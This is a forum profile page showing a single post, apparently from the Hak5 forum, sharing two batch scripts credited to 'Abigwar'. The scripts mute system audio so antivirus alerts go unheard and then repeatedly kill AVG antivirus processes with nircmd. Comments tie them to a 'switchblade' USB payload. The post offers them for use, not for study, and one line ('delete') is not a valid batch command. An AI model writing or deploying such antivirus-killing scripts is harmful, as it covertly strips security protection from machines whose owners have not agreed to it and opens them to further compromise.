Jump to content

Nizmon

Members
  • Posts

    1
  • Joined

  • Last visited

Posts posted by Nizmon

  1. Hey snow-man,

    Try this:

    ::Abigwar's First Attempt at Batch AVkiller
    
    ::Mute the system volume, in case of audible AV Alerts (Avast!)
    nircmd mutesysvolume 1
    
    ::Kill AVG Command Center
    nircmd killprocess avgcc.exe
    
    ::Kill other AVG Processes
    nircmd killprocess avgemc.exe
    nircmd killprocess avgupsvc.exe
    nircmd killprocess avgamsvr.exe
    
    ::Restore system volume at end of switchblade
    nircmd mutesysvolume 0

    and

    ::Theoretical Loop batch
    
    :Start
    nircmd killprocess avgcc.exe
    nircmd killprocess avgemc.exe
    nircmd killprocess avgupsvc.exe
    nircmd killprocess avgamsvr.exe
    
    IF EXIST SWITCHDONE.TXT GOTO END
    GOTO START
    :END
    delete switchdone.txt

    http://hak5.org/forums/index.php?showtopic...p;hl=killing+av

    Thank Abigwar for this.

    Let me know what happens.

    Nizmon

×
×
  • Create New...